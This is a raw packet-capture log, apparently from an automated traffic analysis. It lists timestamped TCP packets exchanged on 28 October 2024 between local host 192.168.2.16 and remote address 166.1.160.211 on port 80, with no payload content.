                                                                                                                                                              Oct 28, 2024 19:46:24.288330078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.288353920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288398981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.288404942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288439989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288481951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.288490057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288526058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288558960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288568974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.288594961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288629055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288639069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.288666010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288701057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.288708925 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.289067030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289114952 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.289118052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289153099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289196968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.289218903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289253950 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289289951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289298058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.289324999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289361000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289366961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.289414883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289454937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289462090 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.289489985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289524078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.289534092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.290050983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290103912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290116072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.290139914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290184975 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.290297985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290350914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290384054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290395975 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.290436983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290472031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290482044 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.290508032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290540934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290550947 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.290575981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290611029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.290621042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.292938948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.292989016 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.293037891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.293092012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.293128967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.293138981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.293164015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.293198109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.293209076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.293236971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.293279886 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.492497921 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.498363018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498430014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498466969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498486042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.498502016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498553991 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.498557091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498593092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498644114 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.498651028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498684883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498720884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498735905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.498758078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498792887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498809099 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.498847961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498883009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498893976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.498918056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498955011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.498965025 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.498989105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499023914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499032021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.499063969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499114990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499121904 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.499150038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499183893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499198914 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.499217987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499253035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499267101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.499289036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499339104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.499408007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499742985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499789000 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.499798059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499834061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499882936 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.499937057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.499990940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500025034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500036955 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.500077963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500113010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500125885 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.500150919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500186920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500194073 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.500269890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500303984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500313997 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.500339031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500371933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500384092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.500406981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500452995 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.500478983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500533104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500566959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500580072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.500617981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500652075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500662088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.500688076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500722885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500732899 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.500833988 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500866890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500878096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.500901937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500950098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.500957012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.500993013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.501028061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:24.501039982 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.543165922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.591803074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:24.815423012 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.058712006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.064511061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.237970114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.238009930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.238044024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.238091946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.238094091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.238128901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.238158941 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.238163948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.238198042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.238219023 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.238230944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.238265038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.238277912 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.238316059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.238352060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.238360882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.292270899 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.355036974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355089903 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355108976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355156898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355192900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355242968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355279922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355330944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355330944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.355330944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.355330944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.355365038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355395079 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355463028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355496883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355529070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355540037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.355540037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.355560064 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.355580091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355612993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355627060 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.355645895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355694056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355698109 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.355751038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355783939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355798960 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.355819941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355864048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.355866909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355901957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355935097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.355947018 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.355968952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.356004953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.356019974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.403131008 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474257946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474334002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474389076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474423885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474461079 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474489927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474489927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474498034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474548101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474551916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474586964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474622011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474637032 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474673986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474709034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474721909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474742889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474777937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474793911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474828959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474857092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474872112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474873066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474889994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474909067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474914074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474925995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474942923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474948883 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474960089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474976063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.474987030 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.474993944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475009918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475018978 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.475025892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475043058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475052118 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.475059986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475075960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475083113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.475094080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.475122929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.515250921 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.533421993 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.539135933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701092958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701134920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701188087 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701189995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701224089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701258898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701289892 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701292992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701342106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701344013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701386929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701438904 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701438904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701488018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701533079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701539040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701574087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701607943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701620102 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701642990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701677084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701687098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701711893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701757908 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701764107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701798916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701836109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701842070 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701889992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701925039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.701948881 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.701976061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702022076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.702253103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702306986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702342033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702370882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.702445030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702478886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702488899 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.702512026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702545881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702558041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.702579975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702622890 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.702877045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.702972889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.703023911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.703030109 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.703073025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.703108072 CET8049726166.1.160.211192.168.2.16
